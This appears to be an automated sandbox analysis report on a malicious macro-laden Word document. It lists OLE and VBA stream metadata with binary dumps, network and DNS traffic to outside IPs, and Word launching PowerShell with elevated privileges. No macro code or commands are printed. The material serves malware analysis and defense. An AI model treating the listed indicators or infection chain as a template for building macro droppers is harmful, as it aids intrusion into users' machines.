Data ASCII: | . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 |
General | |
Stream Path: | Data |
File Type: | dBase III DBT, version number 0, next free block index 552, 1st item "\213<\233\374\024\277\371\333\272\217\335\274\277\235~\017\266\213\336\347{\235O+LJC;c^E\325\376\003p\006\010p>\257\034\375\001" |
Stream Size: | 130884 |
Entropy: | 7.02914979392898 |
Base64 Encoded: | True |
Data ASCII: | ( . . . D . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s . . F . . . . . . . . A . . . . ? . . . . . . . . . . . . . . . ? . . . . . . . . . F . y . t . y . h . w . g . a . y . v . z . w . u . . . 3 . " . . . . . . . ` . . . . . ? . . . . . . . . . . . . . . . 2 . . P . . . . . . 7 . a t { 7 . 6 r ; . , . . . . . . . D . . . . . . ` ! . $ . . . . 7 . a t { 7 . 6 r ; . . . . . . . . . . . . . |
General | |
Stream Path: | Macros/Fbkxcpydi/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.6106491830605214 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . 9 q . . . . . . . . . . . . |
General | |
Stream Path: | Macros/Fbkxcpydi/\x3VBFrame |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 293 |
Entropy: | 4.65317603063951 |
Base64 Encoded: | True |
Data ASCII: | V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } F b k x c p y d i . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 3 0 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 5 0 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w |
General | |
Stream Path: | Macros/Fbkxcpydi/f |
File Type: | data |
Stream Size: | 682 |
Entropy: | 4.132154186006995 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . H . . . . . . . . T . . . , . ( . . . . . . . Y W M . z . F l . z . J d ? 6 . . . . . 0 . . . . . . . . , . . . . . . . . . . . D . . . . . . . V m m y u t u w y y m x e . . . . . . . . . . . . . ( . . . . . . . . . . . H . . . . . . . M z o n z s z c k d d x . . . . . . . . . . , . . . . . . . . . . . D . . . . . . . L u g n n j b j c s y t q . . . . . . . . . . . . . ( . . . . . . . . . . . @ . . . . . . . C e j f e h s i q d p |
General | |
Stream Path: | Macros/Fbkxcpydi/o |
File Type: | data |
Stream Size: | 5365 |
Entropy: | 3.5962878587320564 |
Base64 Encoded: | False |
Data ASCII: | . . $ . . . @ . . . . . H , . . . . . . { . . . F g f x n a f l o k y j . . . . 5 . . . . . . . . . . . . . T a h o m a . . . . ( . . . @ . . . . . H , . . . . . . { . . . P a x n v j g g l l g f w . . . . . . . 5 . . . . . . . . . . . . . T a h o m a . . . . $ . . . @ . . . . . H , . . . . . . { . . . O i i c t q z y e n m f . . . . 5 . . . . . . . . . . . . . T a h o m a . . . . . . . @ . . . . . H , . . . . . . { . . . o w e r s h e . . . . . 5 . . . . . . . . . . . . . T a h o m a e . . . . . . @ . |
General | |
Stream Path: | Macros/PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 616 |
Entropy: | 5.308939685529123 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 3 2 C 0 4 0 1 F - 9 3 B D - 4 2 8 C - 9 E D 1 - C 1 8 5 E 1 7 F A D 7 D } " . . D o c u m e n t = V i d p g e i l / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = F b k x c p y d i . . M o d u l e = B n z a i l e n j g . . E x e N a m e 3 2 = " U f r d r m z p " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G |
General | |
Stream Path: | Macros/PROJECTlk |
File Type: | Windows Precompiled iNF, version 0.1, InfStyle 1, flags 0x59f50000, at 0xf47a |
Stream Size: | 30 |
Entropy: | 3.40623892865339 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . Y W M . z . . . . . . . . |
General | |
Stream Path: | Macros/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 10638 |
Entropy: | 5.338094292911443 |
Base64 Encoded: | False |
Data ASCII: | a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . |
General | |
Stream Path: | Macros/VBA/__SRP_0 |
File Type: | data |
Stream Size: | 1975 |
Entropy: | 4.623946704589897 |
Base64 Encoded: | False |
Data ASCII: | K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ d . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . ! N < c L . . . . . . . . . . . . . . . . . . . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
General | |
Stream Path: | Macros/VBA/__SRP_1 |
File Type: | data |
Stream Size: | 191 |
Entropy: | 2.6043883713669818 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L x i j u p n g v . . . . ! . . . . . . . . . . . . . . ( . . . . . . . d . . . . . . . |
General | |
Stream Path: | Macros/VBA/__SRP_2 |
File Type: | data |
Stream Size: | 440 |
Entropy: | 2.3806145775909835 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Y . . . . . . . . . . . 4 . . . . . . . . . . a . . . . . . . ! . . . . . . . . . . . . . . . . ` . . . . . . . . . . . < . . . A . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . . . . . . y . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
General | |
Stream Path: | Macros/VBA/__SRP_3 |
File Type: | data |
Stream Size: | 142 |
Entropy: | 2.3857723234419117 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . 8 . . . . . . . n . . . . . . . |
General | |
Stream Path: | Macros/VBA/dir |
File Type: | data |
Stream Size: | 1100 |
Entropy: | 6.588091810909644 |
Base64 Encoded: | True |
Data ASCII: | . H . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . ! _ . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * , \\ C . . . . . m . . A ! O f f i c g O D . f . i . c g . |
General | |
Stream Path: | ObjectPool/_1638126958/\x3OCXNAME |
File Type: | data |
Stream Size: | 22 |
Entropy: | 2.272808148826652 |
Base64 Encoded: | False |
Data ASCII: | L . x . i . j . u . p . n . g . v . . . . . |
General | |
Stream Path: | ObjectPool/_1638126958/contents |
File Type: | data |
Stream Size: | 64 |
Entropy: | 3.000394047763189 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . @ . . . . . H , . . . . . . . . . . . P . . . . . . . 7 . . . . . . . . @ . . . . . . . C a l i b r i . |
General | |
Stream Path: | WordDocument |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 1.3697220539987924 |
Base64 Encoded: | False |
Data ASCII: | . s . . . . . . . . . . . . . . . . . . . . . ' . . . . . b j b j 2 ) 2 ) . . . . . . . . . . . . . . . . . . . . . . . . . . P C f P C f ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . B . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 7, 2023 18:14:14.719769955 CET | 49173 | 80 | 192.168.2.22 | 103.224.212.222 |
Feb 7, 2023 18:14:14.885829926 CET | 80 | 49173 | 103.224.212.222 | 192.168.2.22 |
Feb 7, 2023 18:14:14.886035919 CET | 49173 | 80 | 192.168.2.22 | 103.224.212.222 |
Feb 7, 2023 18:14:14.895281076 CET | 49173 | 80 | 192.168.2.22 | 103.224.212.222 |
Feb 7, 2023 18:14:15.102181911 CET | 80 | 49173 | 103.224.212.222 | 192.168.2.22 |
Feb 7, 2023 18:14:15.119752884 CET | 80 | 49173 | 103.224.212.222 | 192.168.2.22 |
Feb 7, 2023 18:14:15.119781971 CET | 80 | 49173 | 103.224.212.222 | 192.168.2.22 |
Feb 7, 2023 18:14:15.119842052 CET | 49173 | 80 | 192.168.2.22 | 103.224.212.222 |
Feb 7, 2023 18:14:15.120667934 CET | 49173 | 80 | 192.168.2.22 | 103.224.212.222 |
Feb 7, 2023 18:14:15.285584927 CET | 80 | 49173 | 103.224.212.222 | 192.168.2.22 |
Feb 7, 2023 18:14:15.304344893 CET | 49174 | 80 | 192.168.2.22 | 13.248.148.254 |
Feb 7, 2023 18:14:15.324196100 CET | 80 | 49174 | 13.248.148.254 | 192.168.2.22 |
Feb 7, 2023 18:14:15.324350119 CET | 49174 | 80 | 192.168.2.22 | 13.248.148.254 |
Feb 7, 2023 18:14:15.324487925 CET | 49174 | 80 | 192.168.2.22 | 13.248.148.254 |
Feb 7, 2023 18:14:15.344772100 CET | 80 | 49174 | 13.248.148.254 | 192.168.2.22 |
Feb 7, 2023 18:14:15.466506958 CET | 80 | 49174 | 13.248.148.254 | 192.168.2.22 |
Feb 7, 2023 18:14:15.560751915 CET | 49175 | 80 | 192.168.2.22 | 162.212.129.161 |
Feb 7, 2023 18:14:15.672749996 CET | 80 | 49174 | 13.248.148.254 | 192.168.2.22 |
Feb 7, 2023 18:14:15.672928095 CET | 49174 | 80 | 192.168.2.22 | 13.248.148.254 |
Feb 7, 2023 18:14:15.686521053 CET | 80 | 49175 | 162.212.129.161 | 192.168.2.22 |
Feb 7, 2023 18:14:15.686666012 CET | 49175 | 80 | 192.168.2.22 | 162.212.129.161 |
Feb 7, 2023 18:14:15.686811924 CET | 49175 | 80 | 192.168.2.22 | 162.212.129.161 |
Feb 7, 2023 18:14:15.812516928 CET | 80 | 49175 | 162.212.129.161 | 192.168.2.22 |
Feb 7, 2023 18:14:15.816334009 CET | 80 | 49175 | 162.212.129.161 | 192.168.2.22 |
Feb 7, 2023 18:14:15.906567097 CET | 49175 | 80 | 192.168.2.22 | 162.212.129.161 |
Feb 7, 2023 18:14:15.906641006 CET | 49174 | 80 | 192.168.2.22 | 13.248.148.254 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 7, 2023 18:14:12.096406937 CET | 55868 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 7, 2023 18:14:12.119050980 CET | 53 | 55868 | 8.8.8.8 | 192.168.2.22 |
Feb 7, 2023 18:14:12.196402073 CET | 49688 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 7, 2023 18:14:12.238814116 CET | 53 | 49688 | 8.8.8.8 | 192.168.2.22 |
Feb 7, 2023 18:14:12.240439892 CET | 137 | 137 | 192.168.2.22 | 192.168.2.255 |
Feb 7, 2023 18:14:12.998070955 CET | 137 | 137 | 192.168.2.22 | 192.168.2.255 |
Feb 7, 2023 18:14:13.762510061 CET | 137 | 137 | 192.168.2.22 | 192.168.2.255 |
Feb 7, 2023 18:14:14.536828995 CET | 58836 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 7, 2023 18:14:14.708704948 CET | 53 | 58836 | 8.8.8.8 | 192.168.2.22 |
Feb 7, 2023 18:14:15.125154018 CET | 50134 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 7, 2023 18:14:15.303457975 CET | 53 | 50134 | 8.8.8.8 | 192.168.2.22 |
Feb 7, 2023 18:14:15.476758957 CET | 55275 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 7, 2023 18:14:15.555291891 CET | 53 | 55275 | 8.8.8.8 | 192.168.2.22 |
Feb 7, 2023 18:14:15.821939945 CET | 59915 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 7, 2023 18:14:15.843313932 CET | 53 | 59915 | 8.8.8.8 | 192.168.2.22 |
Feb 7, 2023 18:14:35.652678967 CET | 138 | 138 | 192.168.2.22 | 192.168.2.255 |
Feb 7, 2023 18:16:05.690131903 CET | 138 | 138 | 192.168.2.22 | 192.168.2.255 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Feb 7, 2023 18:14:12.096406937 CET | 192.168.2.22 | 8.8.8.8 | 0x66b2 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Feb 7, 2023 18:14:12.196402073 CET | 192.168.2.22 | 8.8.8.8 | 0xc630 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Feb 7, 2023 18:14:14.536828995 CET | 192.168.2.22 | 8.8.8.8 | 0xe5a1 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Feb 7, 2023 18:14:15.125154018 CET | 192.168.2.22 | 8.8.8.8 | 0x299d | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Feb 7, 2023 18:14:15.476758957 CET | 192.168.2.22 | 8.8.8.8 | 0x8deb | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Feb 7, 2023 18:14:15.821939945 CET | 192.168.2.22 | 8.8.8.8 | 0xdcc8 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Feb 7, 2023 18:14:12.119050980 CET | 8.8.8.8 | 192.168.2.22 | 0x66b2 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Feb 7, 2023 18:14:12.238814116 CET | 8.8.8.8 | 192.168.2.22 | 0xc630 | Server failure (2) | | none | none | A (IP address) | IN (0x0001) | false |
Feb 7, 2023 18:14:14.708704948 CET | 8.8.8.8 | 192.168.2.22 | 0xe5a1 | No error (0) | | | 103.224.212.222 | A (IP address) | IN (0x0001) | false |
Feb 7, 2023 18:14:15.303457975 CET | 8.8.8.8 | 192.168.2.22 | 0x299d | No error (0) | | 701602.parkingcrew.net | | CNAME (Canonical name) | IN (0x0001) | false |
Feb 7, 2023 18:14:15.303457975 CET | 8.8.8.8 | 192.168.2.22 | 0x299d | No error (0) | | | 13.248.148.254 | A (IP address) | IN (0x0001) | false |
Feb 7, 2023 18:14:15.303457975 CET | 8.8.8.8 | 192.168.2.22 | 0x299d | No error (0) | | | 76.223.26.96 | A (IP address) | IN (0x0001) | false |
Feb 7, 2023 18:14:15.555291891 CET | 8.8.8.8 | 192.168.2.22 | 0x8deb | No error (0) | | | 162.212.129.161 | A (IP address) | IN (0x0001) | false |
Feb 7, 2023 18:14:15.843313932 CET | 8.8.8.8 | 192.168.2.22 | 0xdcc8 | Name error (3) | | none | none | A (IP address) | IN (0x0001) | false |
Target ID: | 0 |
Start time: | 18:13:18 |
Start date: | 07/02/2023 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f060000 |
File size: | 1423704 bytes |
MD5 hash: | 9EE74859D22DAE61F1750B3A1BACB6F5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 5 |
Start time: | 18:13:25 |
Start date: | 07/02/2023 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f5e0000 |
File size: | 473600 bytes |
MD5 hash: | 852D67A27E454BD389FA7F02A8CBE23F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | .Net C# or VB.NET |
Reputation: | high |